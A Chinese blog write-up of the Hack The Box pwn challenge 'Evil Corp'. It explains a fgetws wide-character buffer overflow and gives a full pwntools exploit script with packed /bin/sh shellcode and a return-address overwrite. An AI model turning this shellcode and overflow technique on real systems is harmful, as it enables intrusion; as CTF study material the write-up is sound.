HTB pwn Evil Corp

最新推荐文章于 2024-07-12 16:16:27 发布
最新推荐文章于 2024-07-12 16:16:27 发布
阅读量609 收藏 8
点赞数 10
文章标签: 网络安全 python 汇编 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/136121775
版权

程序分析

在这里插入图片描述
初始化功能
申请了一块正常块和一块可以执行shellcode的空间

在这里插入图片描述
登录
在这里插入图片描述
向正常块写入数据
在这里插入图片描述
字符宽度转换

漏洞分析

所有的输入都使用了fgetws函数这个函数,这个函数会把整个串的每一个字符按最低两个宽来接收输入,如果存在unicode32等等更宽的字符这个函数会把每个字符都按最宽字符的宽度拓展。
例如:
‘a’ 总共占2个字节
‘a’ + '\u1111’总共占4个字节
‘a’ + '\U00000000’总共占8个字节
在这里插入图片描述
在这里插入图片描述
第二个函数是向正常块复制数据但是由于使用了fgetws实际上在空间中就会占用至少0x2000个字节又因为正常块大0x1000字节所以只需要输入0x800个ASCII就可以覆盖完正常块,接下来将shellcode两两一组编成unicode16传输就可以被程序正常接收了。
在这里插入图片描述
成功覆盖出正常块并且写入shellcode到可执行块上
在这里插入图片描述
这边也同理我们可以使用ASCII来多占空间完成栈溢出,最后可以使用unicode32字符一次性占4个字节完成地址覆盖。

exp

from pwn import *
context.arch = 'amd64'
def gd():
 gdb.attach(p)
 pause()
def login():
 p.recvuntil(b'Username: ')
 p.sendline(b'eliot') 
 p.recvuntil(b'Password: ')
 p.sendline(b'4007')
def logout():
 p.recvuntil(b">> ")
 p.sendline(b'3') 
def login1(data):
 p.recvuntil(b'Username: ')
 p.sendline(b'eliot') 
 p.recvuntil(b'Password: ')
 p.sendline(data) 
def input(data):
 p.recvuntil(b">> ")
 p.sendline(b'2')
 sleep(0.1)
 p.sendline(data)
p = process("./evil-corp")
#p = remote("94.237.54.75",54453)
login()
shellcode='\u686a\ub848\u622f\u6e69\u2f2f\u732f\u4850\ue789\u7268\u0169\u8101\u2434\u0101\u0101\uf631\u6a56\u5e08\u0148\u56e6\u8948\u31e6\u6ad2\u583b\u050f'
input('a'*0x800 + shellcode)
logout()
login1('a' * 0x56 + '\U00011000' + '\x00\x00')#0x56 * 4 = 0x158

p.interactive()

成功getshell
在这里插入图片描述
在这里插入图片描述

萌の鱼
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
分类流控qdisc之htb
九天小哥的专栏
11-06 1811
文章目录tc参数配置示例算法思想用户态实现数据结构htb全局配置参数: tc_htb_globhtb类配置参数: tc_htb_optqdisc配置参数解析: htb_parse_opt()class配置参数解析: htb_parse_copt()内核实现数据结构qdisc操作集私有数据: htb_schedhtb类结构: htb_classqdisc操作集: htb_qdisc_ops初始化: htb_init()qdisc类操作集: htb_class_opschange()回调: htb_change
HTB靶机:RainyDay
LainWith的博客
11-27 1675
系统:linux难度:困难发布日期:2022/10/16其他信息:2022年10月24日靶场删除了泄露的root的 SSH 密钥,并更改了泄露的root密码。个人打靶发现靶机还删除了python,其他变化尚未发现。补充:这台靶机与Vulnhub靶机较为相似,只是利用起来更复杂很多。
HTB pwn Dragon Army
qq_62172019的博客
02-23 498
HTB pwn Dragon Army
黑客入门,从HTB开始
热门推荐
neal1991的专栏
10-20 4万+
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场。 之前在 HTB 也玩过一些机器。里面的机器难度有好几个档次,insane 难度的一般都是极其困难的,这种机器一般让我对着大神的 Writeup 我可能都没有办法复现出来。之前也有在公众号上分享过几篇 H...
pwn入门&&HTB_You know 0xDiablos例题讲解
网络安全学习
03-17 449
pwn题0基础讲解,看不懂来砍我
htb:Starting Point
LainWith的博客
10-19 1342
第0层部分靶机免费,部分靶机收费。由于这部分太过简单,因此一笔带过。 第一关Meow是telnet靶场:https://www.bilibili.com/video/BV1nS4y137GQ 第二关Fawn是ftp靶场:https://www.bilibili.com/video/BV11F41147Kf 第三关Dancing是SMB靶场:https://www.bilibili.com/video/BV1nS4y137vm 第四关Redeemer是Redis靶场:https://www.theethica
HTB pwn Bad grades&Restaurant
qq_62172019的博客
02-20 438
HTB pwn Bad grades&Restaurant
HTB WP】Archetype
Pz_mstr's Blog
02-03 351
Hack the box - Archetype WP
htb
03-11
相关项目。
HTB单线策略测试
08-18
在网络安全和信息技术领域,HTB(Hierarchical Token Bucket,分层令牌桶)是一种流量整形算法,常用于网络设备如路由器和交换机中,用于管理和控制网络数据流的传输速率,确保网络服务的质量和稳定性。本话题我们将...
ROS PCQ HTB.rar
10-23
PCQ HTB(Priority Class Queue with Hierarchical Token Bucket)是ROS中的一个网络流量控制策略,它用于管理和优化机器人通信中的数据传输。在ROS系统中,HTB是一种重要的队列管理方法,用于实现带宽的精细化分配...
ros脚本HTB+PCQ
01-05
在本文中,我们将探讨“ROS脚本HTB+PCQ”这一主题,这是一种利用ROS系统的工具来实现网络流量限速的高级技术,特别适用于优化网页游戏体验和在线视频观看。 **HTB(Hierarchical Token Bucket)限速** HTB是Linux...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 103
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 744
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 659
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 2326
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
一键安装ros及出现问题的解决方案
m0_58173801的博客
07-10 555
catkin_make时出现报错如下。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值